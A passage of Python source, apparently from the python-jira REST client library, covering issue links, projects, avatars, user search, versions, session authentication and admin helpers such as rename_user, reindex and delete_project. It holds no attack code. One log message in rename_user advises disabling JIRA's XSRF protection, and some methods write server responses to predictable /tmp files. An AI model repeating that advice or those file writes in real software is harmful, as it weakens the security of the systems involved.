def create_issue_link(self, type, inwardIssue, outwardIssue, comment=None):
"""
Create a link between two issues.
:param type: the type of link to create
:param inwardIssue: the issue to link from
:param outwardIssue: the issue to link to
:param comment: a comment to add to the issues with the link. Should be a dict containing ``body``\
and ``visibility`` fields: ``body`` being the text of the comment and ``visibility`` being a dict containing\
two entries: ``type`` and ``value``. ``type`` is ``role`` (or ``group`` if the JIRA server has configured\
comment visibility for groups) and ``value`` is the name of the role (or group) to which viewing of this\
comment will be restricted.
"""
# let's see if we have the right issue link 'type' and fix it if needed
        if not hasattr(self, '_cached_issue_link_types'):
self._cached_issue_link_types = self.issue_link_types()
if type not in self._cached_issue_link_types:
for lt in self._cached_issue_link_types:
if lt.outward == type:
                    # the outward description was given, so use the link type's canonical name
type = lt.name
break
elif lt.inward == type:
                    # the inward description was given, so swap the issues to keep the intended direction
type = lt.name
inwardIssue, outwardIssue = outwardIssue, inwardIssue
break
data = {
'type': {
'name': type
},
'inwardIssue': {
'key': inwardIssue
},
'outwardIssue': {
'key': outwardIssue
},
'comment': comment
}
url = self._get_url('issueLink')
r = self._session.post(
url, data=json.dumps(data))
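    # Usage sketch (illustrative only): assuming an authenticated client `jira`
    # and a 'Duplicate' link type configured on the server, linking two issues
    # could look like:
    #
    #   jira.create_issue_link(type='Duplicate',
    #                          inwardIssue='TEST-1', outwardIssue='TEST-2')
    #
    # The link type name and issue keys are assumptions for the example.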
def issue_link(self, id):
"""
Get an issue link Resource from the server.
:param id: ID of the issue link to get
"""
return self._find_for_resource(IssueLink, id)
# Issue link types
def issue_link_types(self):
"""Get a list of issue link type Resources from the server."""
r_json = self._get_json('issueLinkType')
link_types = [IssueLinkType(self._options, self._session, raw_link_json) for raw_link_json in
r_json['issueLinkTypes']]
return link_types
def issue_link_type(self, id):
"""
Get an issue link type Resource from the server.
:param id: ID of the issue link type to get
"""
return self._find_for_resource(IssueLinkType, id)
# Issue types
def issue_types(self):
"""Get a list of issue type Resources from the server."""
r_json = self._get_json('issuetype')
issue_types = [IssueType(
self._options, self._session, raw_type_json) for raw_type_json in r_json]
return issue_types
def issue_type(self, id):
"""
Get an issue type Resource from the server.
:param id: ID of the issue type to get
"""
return self._find_for_resource(IssueType, id)
# User permissions
# non-resource
def my_permissions(self, projectKey=None, projectId=None, issueKey=None, issueId=None):
"""
Get a dict of all available permissions on the server.
:param projectKey: limit returned permissions to the specified project
:param projectId: limit returned permissions to the specified project
:param issueKey: limit returned permissions to the specified issue
:param issueId: limit returned permissions to the specified issue
"""
params = {}
if projectKey is not None:
params['projectKey'] = projectKey
if projectId is not None:
params['projectId'] = projectId
if issueKey is not None:
params['issueKey'] = issueKey
if issueId is not None:
params['issueId'] = issueId
return self._get_json('mypermissions', params=params)
# Priorities
def priorities(self):
"""Get a list of priority Resources from the server."""
r_json = self._get_json('priority')
priorities = [Priority(
self._options, self._session, raw_priority_json) for raw_priority_json in r_json]
return priorities
def priority(self, id):
"""
Get a priority Resource from the server.
:param id: ID of the priority to get
"""
return self._find_for_resource(Priority, id)
# Projects
def projects(self):
"""Get a list of project Resources from the server visible to the current authenticated user."""
r_json = self._get_json('project')
projects = [Project(
self._options, self._session, raw_project_json) for raw_project_json in r_json]
return projects
def project(self, id):
"""
Get a project Resource from the server.
:param id: ID or key of the project to get
"""
return self._find_for_resource(Project, id)
# non-resource
@translate_resource_args
def project_avatars(self, project):
"""
Get a dict of all avatars for a project visible to the current authenticated user.
:param project: ID or key of the project to get avatars for
"""
return self._get_json('project/' + project + '/avatars')
@translate_resource_args
def create_temp_project_avatar(self, project, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a project avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on libmagic and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_project_avatar` to finish the avatar creation process. If\
you want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the 'auto_confirm'\
argument with a truthy value and :py:meth:`confirm_project_avatar` will be called for you before this method\
returns.
:param project: ID or key of the project to create the avatar in
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object holding the avatar
:param contentType: explicit specification for the avatar image's content-type
:param boolean auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_project_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('project/' + project + '/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_project_avatar(project, cropping_properties)
else:
return cropping_properties
@translate_resource_args
def confirm_project_avatar(self, project, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_project_avatar`, use this method to confirm the avatar
for use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_project_avatar` should be used for this
argument.
:param project: ID or key of the project to confirm the avatar in
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_project_avatar`
"""
data = cropping_properties
url = self._get_url('project/' + project + '/avatar')
r = self._session.post(
url, data=json.dumps(data))
return json_loads(r)
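    # Usage sketch (illustrative only): the two-step avatar workflow, assuming a
    # project 'TEST' and a local PNG file, could look like:
    #
    #   with open('avatar.png', 'rb') as f:
    #       props = jira.create_temp_project_avatar(
    #           'TEST', 'avatar.png', os.path.getsize('avatar.png'), f)
    #   avatar = jira.confirm_project_avatar('TEST', props)
    #
    # Passing auto_confirm=True collapses both steps into one call. The project
    # key and file name are assumptions for the example.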
@translate_resource_args
def set_project_avatar(self, project, avatar):
"""
Set a project's avatar.
:param project: ID or key of the project to set the avatar on
:param avatar: ID of the avatar to set
"""
self._set_avatar(
None, self._get_url('project/' + project + '/avatar'), avatar)
@translate_resource_args
def delete_project_avatar(self, project, avatar):
"""
Delete a project's avatar.
:param project: ID or key of the project to delete the avatar from
        :param avatar: ID of the avatar to delete
"""
url = self._get_url('project/' + project + '/avatar/' + avatar)
r = self._session.delete(url)
@translate_resource_args
def project_components(self, project):
"""
Get a list of component Resources present on a project.
:param project: ID or key of the project to get components from
"""
r_json = self._get_json('project/' + project + '/components')
components = [Component(
self._options, self._session, raw_comp_json) for raw_comp_json in r_json]
return components
@translate_resource_args
def project_versions(self, project):
"""
Get a list of version Resources present on a project.
:param project: ID or key of the project to get versions from
"""
r_json = self._get_json('project/' + project + '/versions')
versions = [
Version(self._options, self._session, raw_ver_json) for raw_ver_json in r_json]
return versions
# non-resource
@translate_resource_args
def project_roles(self, project):
"""
Get a dict of role names to resource locations for a project.
:param project: ID or key of the project to get roles from
"""
return self._get_json('project/' + project + '/role')
@translate_resource_args
def project_role(self, project, id):
"""
Get a role Resource.
:param project: ID or key of the project to get the role from
:param id: ID of the role to get
"""
return self._find_for_resource(Role, (project, id))
# Resolutions
def resolutions(self):
"""Get a list of resolution Resources from the server."""
r_json = self._get_json('resolution')
resolutions = [Resolution(
self._options, self._session, raw_res_json) for raw_res_json in r_json]
return resolutions
def resolution(self, id):
"""
Get a resolution Resource from the server.
:param id: ID of the resolution to get
"""
return self._find_for_resource(Resolution, id)
# Search
def search_issues(self, jql_str, startAt=0, maxResults=50, validate_query=True, fields=None, expand=None,
json_result=None):
"""
Get a ResultList of issue Resources matching a JQL search string.
:param jql_str: the JQL search string to use
:param startAt: index of the first issue to return
:param maxResults: maximum number of issues to return. Total number of results
is available in the ``total`` attribute of the returned ResultList.
If maxResults evaluates as False, it will try to get all issues in batches of 50.
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# TODO what to do about the expand, which isn't related to the issues?
infinite = False
maxi = 50
idx = 0
if fields is None:
fields = []
if isinstance(fields, ("".__class__, u"".__class__)):
fields = fields.split(",")
        # this will translate JQL field names to REST API field names;
        # most people know the JQL names, so this helps them use the API more easily
untranslate = {} # use to add friendly aliases when we get the results back
if self._fields:
for i, field in enumerate(fields):
if field in self._fields:
untranslate[self._fields[field]] = fields[i]
fields[i] = self._fields[field]
        # if maxResults evaluates as False, fetch all issues from the query in batches
if not maxResults:
maxResults = maxi
infinite = True
search_params = {
"jql": jql_str,
"startAt": startAt,
"maxResults": maxResults,
"validateQuery": validate_query,
"fields": fields,
"expand": expand
}
if json_result:
return self._get_json('search', params=search_params)
resource = self._get_json('search', params=search_params)
issues = [Issue(self._options, self._session, raw_issue_json)
for raw_issue_json in resource['issues']]
cnt = len(issues)
total = resource['total']
if infinite:
while cnt == maxi:
idx += maxi
search_params["startAt"] = idx
resource = self._get_json('search', params=search_params)
issue_batch = [Issue(self._options, self._session, raw_issue_json) for raw_issue_json in
resource['issues']]
issues.extend(issue_batch)
cnt = len(issue_batch)
if untranslate:
for i in issues:
for k, v in untranslate.items():
if k in i.raw['fields']:
i.raw['fields'][v] = i.raw['fields'][k]
return ResultList(issues, total)
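    # Usage sketch (illustrative only): assuming an authenticated client `jira`
    # and a project 'TEST', fetching every open issue (maxResults=False pages
    # through the results in batches of 50) could look like:
    #
    #   issues = jira.search_issues(
    #       'project = TEST AND resolution = Unresolved ORDER BY priority DESC',
    #       maxResults=False, fields='summary,assignee')
    #
    # The JQL string and field names are assumptions for the example.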
# Security levels
def security_level(self, id):
"""
Get a security level Resource.
:param id: ID of the security level to get
"""
return self._find_for_resource(SecurityLevel, id)
# Server info
# non-resource
def server_info(self):
"""Get a dict of server information for this JIRA instance."""
return self._get_json('serverInfo')
def myself(self):
"""Get a dict of server information for this JIRA instance."""
return self._get_json('myself')
# Status
def statuses(self):
"""Get a list of status Resources from the server."""
r_json = self._get_json('status')
statuses = [Status(self._options, self._session, raw_stat_json)
for raw_stat_json in r_json]
return statuses
def status(self, id):
"""
Get a status Resource from the server.
:param id: ID of the status resource to get
"""
return self._find_for_resource(Status, id)
# Users
def user(self, id, expand=None):
"""
Get a user Resource from the server.
:param id: ID of the user to get
:param expand: extra information to fetch inside each resource
"""
user = User(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
user.find(id, params=params)
return user
def search_assignable_users_for_projects(self, username, projectKeys, startAt=0, maxResults=50):
"""
Get a list of user Resources that match the search string and can be assigned issues for projects.
:param username: a string to match usernames against
:param projectKeys: comma-separated list of project keys to check for issue assignment permissions
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'projectKeys': projectKeys,
'startAt': startAt,
'maxResults': maxResults
}
r_json = self._get_json(
'user/assignable/multiProjectSearch', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_assignable_users_for_issues(self, username, project=None, issueKey=None, expand=None, startAt=0,
maxResults=50):
"""
Get a list of user Resources that match the search string for assigning or creating issues.
This method is intended to find users that are eligible to create issues in a project or be assigned
to an existing issue. When searching for eligible creators, specify a project. When searching for eligible
assignees, specify an issue key.
:param username: a string to match usernames against
:param project: filter returned users by permission in this project (expected if a result will be used to \
create an issue)
:param issueKey: filter returned users by this issue (expected if a result will be used to edit this issue)
:param expand: extra information to fetch inside each resource
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'startAt': startAt,
'maxResults': maxResults,
}
if project is not None:
params['project'] = project
if issueKey is not None:
params['issueKey'] = issueKey
if expand is not None:
params['expand'] = expand
r_json = self._get_json('user/assignable/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# non-resource
def user_avatars(self, username):
"""
Get a dict of avatars for the specified user.
:param username: the username to get avatars for
"""
return self._get_json('user/avatars', params={'username': username})
def create_temp_user_avatar(self, user, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a user avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on ``libmagic`` and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_user_avatar` to finish the avatar creation process. If you
want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the ``auto_confirm``
argument with a truthy value and :py:meth:`confirm_user_avatar` will be called for you before this method
returns.
:param user: user to register the avatar for
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object containing the avatar
:param contentType: explicit specification for the avatar image's content-type
:param auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_user_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'username': user,
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('user/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_user_avatar(user, cropping_properties)
else:
return cropping_properties
def confirm_user_avatar(self, user, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_user_avatar`, use this method to confirm the avatar for
use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_user_avatar` should be used for this
argument.
:param user: the user to confirm the avatar for
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_user_avatar`
"""
data = cropping_properties
url = self._get_url('user/avatar')
r = self._session.post(url, params={'username': user},
data=json.dumps(data))
return json_loads(r)
def set_user_avatar(self, username, avatar):
"""
Set a user's avatar.
:param username: the user to set the avatar for
:param avatar: ID of the avatar to set
"""
self._set_avatar(
{'username': username}, self._get_url('user/avatar'), avatar)
def delete_user_avatar(self, username, avatar):
"""
Delete a user's avatar.
:param username: the user to delete the avatar from
:param avatar: ID of the avatar to remove
"""
params = {'username': username}
url = self._get_url('user/avatar/' + avatar)
r = self._session.delete(url, params=params)
def search_users(self, user, startAt=0, maxResults=50, includeActive=True, includeInactive=False):
"""
Get a list of user Resources that match the specified search string.
:param user: a string to match usernames, name or email against
:param startAt: index of the first user to return
        :param maxResults: maximum number of users to return
        :param includeActive: whether to include active users in the results (default True)
        :param includeInactive: whether to include inactive users in the results (default False)
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
'includeActive': includeActive,
'includeInactive': includeInactive
}
r_json = self._get_json('user/search', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_allowed_users_for_issue(self, user, issueKey=None, projectKey=None, startAt=0, maxResults=50):
"""
Get a list of user Resources that match a username string and have browse permission for the issue or
project.
:param user: a string to match usernames against
:param issueKey: find users with browse permission for this issue
:param projectKey: find users with browse permission for this project
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
}
if issueKey is not None:
params['issueKey'] = issueKey
if projectKey is not None:
params['projectKey'] = projectKey
r_json = self._get_json('user/viewissue/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# Versions
@translate_resource_args
def create_version(self, name, project, description=None, releaseDate=None, startDate=None, archived=False,
released=False):
"""
Create a version in a project and return a Resource for it.
:param name: name of the version to create
:param project: key of the project to create the version in
:param description: a description of the version
:param releaseDate: the release date assigned to the version
:param startDate: The start date for the version
"""
data = {
'name': name,
'project': project,
'archived': archived,
'released': released
}
if description is not None:
data['description'] = description
if releaseDate is not None:
data['releaseDate'] = releaseDate
if startDate is not None:
data['startDate'] = startDate
url = self._get_url('version')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
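    # Usage sketch (illustrative only): assuming a project key 'TEST', creating
    # a released version could look like:
    #
    #   v = jira.create_version('1.2.0', 'TEST',
    #                           description='maintenance release',
    #                           releaseDate='2015-06-01', released=True)
    #
    # The project key, version name and date format are assumptions for the example.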
def move_version(self, id, after=None, position=None):
"""
Move a version within a project's ordered version list and return a new version Resource for it. One,
but not both, of ``after`` and ``position`` must be specified.
:param id: ID of the version to move
:param after: the self attribute of a version to place the specified version after (that is, higher in the list)
:param position: the absolute position to move this version to: must be one of ``First``, ``Last``,\
``Earlier``, or ``Later``
"""
data = {}
if after is not None:
data['after'] = after
elif position is not None:
data['position'] = position
url = self._get_url('version/' + id + '/move')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
def version(self, id, expand=None):
"""
Get a version Resource.
:param id: ID of the version to get
:param expand: extra information to fetch inside each resource
"""
version = Version(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
version.find(id, params=params)
return version
def version_count_related_issues(self, id):
"""
Get a dict of the counts of issues fixed and affected by a version.
:param id: the version to count issues for
"""
r_json = self._get_json('version/' + id + '/relatedIssueCounts')
del r_json['self'] # this isn't really an addressable resource
return r_json
def version_count_unresolved_issues(self, id):
"""
Get the number of unresolved issues for a version.
:param id: ID of the version to count issues for
"""
return self._get_json('version/' + id + '/unresolvedIssueCount')['issuesUnresolvedCount']
# Session authentication
def session(self):
"""Get a dict of the current authenticated user's session information."""
url = '{server}/rest/auth/1/session'.format(**self._options)
if type(self._session.auth) is tuple:
authentication_data = {
'username': self._session.auth[0], 'password': self._session.auth[1]}
r = self._session.post(url, data=json.dumps(authentication_data))
else:
r = self._session.get(url)
user = User(self._options, self._session, json_loads(r))
return user
def kill_session(self):
"""Destroy the session of the current authenticated user."""
url = self._options['server'] + '/rest/auth/latest/session'
r = self._session.delete(url)
# Websudo
def kill_websudo(self):
"""Destroy the user's current WebSudo session."""
url = self._options['server'] + '/rest/auth/1/websudo'
r = self._session.delete(url)
# Utilities
def _create_http_basic_session(self, username, password):
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = (username, password)
self._session.cert = self._options['client_cert']
def _create_oauth_session(self, oauth):
verify = self._options['verify']
from requests_oauthlib import OAuth1
from oauthlib.oauth1 import SIGNATURE_RSA
oauth = OAuth1(
oauth['consumer_key'],
rsa_key=oauth['key_cert'],
signature_method=SIGNATURE_RSA,
resource_owner_key=oauth['access_token'],
resource_owner_secret=oauth['access_token_secret']
)
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = oauth
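    # Usage sketch (illustrative only): the oauth dict consumed above is expected
    # to carry the four keys used when building the OAuth1 object. A hypothetical
    # client construction could look like:
    #
    #   key_cert_data = open('jira.pem').read()
    #   jira = JIRA(options={'server': 'https://jira.example.com'},
    #               oauth={'access_token': '...',
    #                      'access_token_secret': '...',
    #                      'consumer_key': 'oauth-consumer',
    #                      'key_cert': key_cert_data})
    #
    # The server URL, consumer key and certificate file are assumptions for the example.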
@staticmethod
def _timestamp(dt=None):
t = datetime.datetime.utcnow()
if dt is not None:
t += dt
return calendar.timegm(t.timetuple())
def _create_jwt_session(self, jwt):
try:
jwt_auth = JWTAuth(jwt['secret'], alg='HS256')
except NameError as e:
globals()['logging'].error("JWT authentication requires requests_jwt")
raise e
jwt_auth.add_field("iat", lambda req: JIRA._timestamp())
jwt_auth.add_field("exp", lambda req: JIRA._timestamp(datetime.timedelta(minutes=3)))
jwt_auth.add_field("qsh", QshGenerator(self._options['context_path']))
for f in jwt['payload'].items():
jwt_auth.add_field(f[0], f[1])
self._session = ResilientSession()
self._session.verify = self._options['verify']
self._session.auth = jwt_auth
def _set_avatar(self, params, url, avatar):
data = {
'id': avatar
}
r = self._session.put(url, params=params, data=json.dumps(data))
def _get_url(self, path, base=JIRA_BASE_URL):
options = self._options
options.update({'path': path})
return base.format(**options)
def _get_json(self, path, params=None, base=JIRA_BASE_URL):
url = self._get_url(path, base)
r = self._session.get(url, params=params)
try:
r_json = json_loads(r)
except ValueError as e:
logging.error("%s\n%s" % (e, r.text))
raise e
return r_json
def _find_for_resource(self, resource_cls, ids, expand=None):
resource = resource_cls(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
resource.find(id=ids, params=params)
return resource
def _try_magic(self):
try:
import magic
import weakref
except ImportError:
self._magic = None
else:
try:
_magic = magic.Magic(flags=magic.MAGIC_MIME_TYPE)
def cleanup(x):
_magic.close()
self._magic_weakref = weakref.ref(self, cleanup)
self._magic = _magic
except TypeError:
self._magic = None
except AttributeError:
self._magic = None
def _get_mime_type(self, buff):
if self._magic is not None:
return self._magic.id_buffer(buff)
else:
try:
return mimetypes.guess_type("f." + imghdr.what(0, buff))[0]
except (IOError, TypeError):
logging.warning("Couldn't detect content type of avatar image"
". Specify the 'contentType' parameter explicitly.")
return None
def email_user(self, user, body, title="JIRA Notification"):
"""
        Send an email to a user through the ScriptRunner SendCustomEmail canned script (requires that plugin).
"""
url = self._options['server'] + \
'/secure/admin/groovy/CannedScriptRunner.jspa'
payload = {
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'cannedScriptArgs_FIELD_CONDITION': '',
'cannedScriptArgs_FIELD_EMAIL_TEMPLATE': body,
'cannedScriptArgs_FIELD_EMAIL_SUBJECT_TEMPLATE': title,
'cannedScriptArgs_FIELD_EMAIL_FORMAT': 'TEXT',
'cannedScriptArgs_FIELD_TO_ADDRESSES': self.user(user).emailAddress,
'cannedScriptArgs_FIELD_TO_USER_FIELDS': '',
'cannedScriptArgs_FIELD_INCLUDE_ATTACHMENTS': 'FIELD_INCLUDE_ATTACHMENTS_NONE',
'cannedScriptArgs_FIELD_FROM': '',
'cannedScriptArgs_FIELD_PREVIEW_ISSUE': '',
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'id': '',
'Preview': 'Preview',
}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
open("/tmp/jira_email_user_%s.html" % user, "w").write(r.text)
def rename_user(self, old_user, new_user):
"""
        Rename a JIRA user. On JIRA >= 6.0.0 this uses the REST API; on older versions it relies on the third-party ScriptRunner plugin.
:param old_user: string with username login
:param new_user: string with username login
"""
if self._version >= (6, 0, 0):
url = self._options['server'] + '/rest/api/2/user'
payload = {
"name": new_user,
}
params = {
'username': old_user
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.put(url, params=params,
data=json.dumps(payload))
else:
            # old implementation needed the ScriptRunner plugin
merge = "true"
try:
self.user(new_user)
            except JIRAError:
merge = "false"
url = self._options[
'server'] + '/secure/admin/groovy/CannedScriptRunner.jspa#result'
payload = {
"cannedScript": "com.onresolve.jira.groovy.canned.admin.RenameUser",
"cannedScriptArgs_FIELD_FROM_USER_ID": old_user,
"cannedScriptArgs_FIELD_TO_USER_ID": new_user,
"cannedScriptArgs_FIELD_MERGE": merge,
"id": "",
"RunCanned": "Run",
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 404:
logging.error(
"In order to be able to use rename_user() you need to install Script Runner plugin. See https://marketplace.atlassian.com/plugins/com.onresolve.jira.groovy.groovyrunner")
return False
if r.status_code != 200:
logging.error(r.status_code)
if re.compile("XSRF Security Token Missing").search(r.content):
logging.fatal(
"Reconfigure JIRA and disable XSRF in order to be able call this. See https://developer.atlassian.com/display/JIRADEV/Form+Token+Handling")
return False
open("/tmp/jira_rename_user_%s_to%s.html" %
(old_user, new_user), "w").write(r.content)
msg = r.status_code
m = re.search("<span class=\"errMsg\">(.*)<\/span>", r.content)
if m:
msg = m.group(1)
logging.error(msg)
return False
# <span class="errMsg">Target user ID must exist already for a merge</span>
p = re.compile("type=\"hidden\" name=\"cannedScriptArgs_Hidden_output\" value=\"(.*?)\"\/>",
re.MULTILINE | re.DOTALL)
m = p.search(r.content)
if m:
h = html_parser.HTMLParser()
msg = h.unescape(m.group(1))
logging.info(msg)
# let's check if the user still exists
try:
self.user(old_user)
                except JIRAError:
logging.error("User %s does not exists." % old_user)
return msg
logging.error(msg)
logging.error(
"User %s does still exists after rename, that's clearly a problem." % old_user)
return False
def delete_user(self, username):
url = self._options['server'] + \
'/rest/api/latest/user/?username=%s' % username
r = self._session.delete(url)
if 200 <= r.status_code <= 299:
return True
else:
logging.error(r.status_code)
return False
def reindex(self, force=False, background=True):
"""
        Start JIRA re-indexing. Returns True if reindexing is in progress or not needed, and False otherwise.
        If you call reindex() without any parameters it will perform a background reindex only if JIRA thinks it is needed.
        :param force: reindex even if JIRA doesn't say this is needed, False by default.
        :param background: reindex in the background, slower but does not impact the users, defaults to True.
"""
# /secure/admin/IndexAdmin.jspa
# /secure/admin/jira/IndexProgress.jspa?taskId=1
if background:
indexingStrategy = 'background'
else:
indexingStrategy = 'stoptheworld'
url = self._options['server'] + '/secure/admin/jira/IndexReIndex.jspa'
r = self._session.get(url, headers=self._options['headers'])
if r.status_code == 503:
# logging.warning("JIRA returned 503, this could mean that a full reindex is in progress.")
return 503
if not r.text.find("To perform the re-index now, please go to the") and force is False:
return True
if r.text.find('All issues are being re-indexed'):
logging.warning("JIRA re-indexing is already running.")
            return True  # a reindex that is already in progress still counts as a success
if r.text.find('To perform the re-index now, please go to the') or force:
r = self._session.post(url, headers=self._options['headers'],
params={"indexingStrategy": indexingStrategy, "reindex": "Re-Index"})
if r.text.find('All issues are being re-indexed') != -1:
return True
else:
logging.error("Failed to reindex jira, probably a bug.")
return False
def backup(self, filename='backup.zip'):
"""
        Call the JIRA XML export to back up as zipped XML. A successful return does not mean that the backup process has finished.
"""
url = self._options['server'] + '/secure/admin/XmlBackup.jspa'
payload = {'filename': filename}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 200:
return True
else:
logging.warning(
'Got %s response from calling backup.' % r.status_code)
return r.status_code
def current_user(self):
if not hasattr(self, '_serverInfo') or 'username' not in self._serverInfo:
url = self._get_url('serverInfo')
r = self._session.get(url, headers=self._options['headers'])
r_json = json_loads(r)
if 'x-ausername' in r.headers:
r_json['username'] = r.headers['x-ausername']
else:
r_json['username'] = None
self._serverInfo = r_json
# del r_json['self'] # this isn't really an addressable resource
return self._serverInfo['username']
def delete_project(self, pid):
"""
        Delete a project; ``pid`` can be a project id, project key or project name. Returns False on failure.
"""
found = False
try:
if not str(int(pid)) == pid:
found = True
except Exception as e:
r_json = self._get_json('project')
for e in r_json:
if e['key'] == pid or e['name'] == pid:
pid = e['id']
found = True
break
if not found:
logging.error("Unable to recognize project `%s`" % pid)
return False
uri = '/secure/admin/DeleteProject.jspa'
url = self._options['server'] + uri
payload = {'pid': pid, 'Delete': 'Delete', 'confirm': 'true'}
try:
r = self._gain_sudo_session(payload, uri)
if r.status_code != 200 or not self._check_for_html_error(r.text):
return False
except JIRAError as e:
raise JIRAError(0, "You must have global administrator rights to delete projects.")
return False
r = self._session.post(
url, headers=CaseInsensitiveDict({'content-type': 'application/x-www-form-urlencoded'}), data=payload)
if r.status_code == 200:
return self._check_for_html_error(r.text)
else:
logging.warning(
'Got %s response from calling delete_project.' % r.status_code)
return r.status_code
def _gain_sudo_session(self, options, destination):
url = self._options['server'] + '/secure/admin/WebSudoAuthenticate.jspa'
if not self._session.auth:
self._session.auth = get_netrc_auth(url)
payload = {
'webSudoPassword': self._session.auth[1],
'webSudoDestination': destination,
'webSudoIsPost': 'true',
}
payload.update(options)
return self._session.post(
url, headers=CaseInsensitiveDict({'content-type': 'application/x-www-form-urlencoded'}), data=payload)
def create_project(self, key, name=None, assignee=None, type="Software"):
"""
Key is mandatory and has to match JIRA project key requirements, usually only 2-10 uppercase characters.
If name is not specified it will use the key value.
If assignee is not specified it will use current user.
The returned value should evaluate to False if it fails otherwise it will be the new project id.
"""
if assignee is None:
assignee = self.current_user()
if name is None:
name = key
if key.upper() != key or not key.isalpha() or len(key) < 2 or len(key) > 10:
logging.error(
                'key parameter is not all uppercase alphabetic with length between 2 and 10')
return False
url = self._options['server'] + \
'/rest/project-templates/1.0/templates'
r = self._session.get(url)
j = json_loads(r)
template_key = None
templates = []
for template in j['projectTemplates']:
templates.append(template['name'])
if template['name'] in ['JIRA Classic', 'JIRA Default Schemes']:
template_key = template['projectTemplateModuleCompleteKey']
break
if not template_key:
raise JIRAError(
"Unable to find a suitable project template to use. Found only: " + ', '.join(templates))
payload = {'name': name,
'key': key,
'keyEdited': 'false',
#'projectTemplate': 'com.atlassian.jira-core-project-templates:jira-issuetracking',
#'permissionScheme': '',
'projectTemplateWebItemKey': template_key,
'projectTemplateModuleKey': template_key,
'lead': assignee,
#'assigneeType': '2',
}
if self._version[0] > 6:
# JIRA versions before 7 will throw an error if we specify type parameter
payload['type'] = type
headers = CaseInsensitiveDict(
{'Content-Type': 'application/x-www-form-urlencoded'})
r = self._session.post(url, data=payload, headers=headers)
if r.status_code == 200:
r_json = json_loads(r)
return r_json
f = tempfile.NamedTemporaryFile(
suffix='.html', prefix='python-jira-error-create-project-', delete=False)
f.write(r.text)
if self.logging:
logging.error(
"Unexpected result while running create project. Server response saved in %s for further investigation [HTTP response=%s]." % (
f.name, r.status_code))
return False
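    # Usage sketch (illustrative only): assuming global admin rights, creating a
    # project led by the current user could look like:
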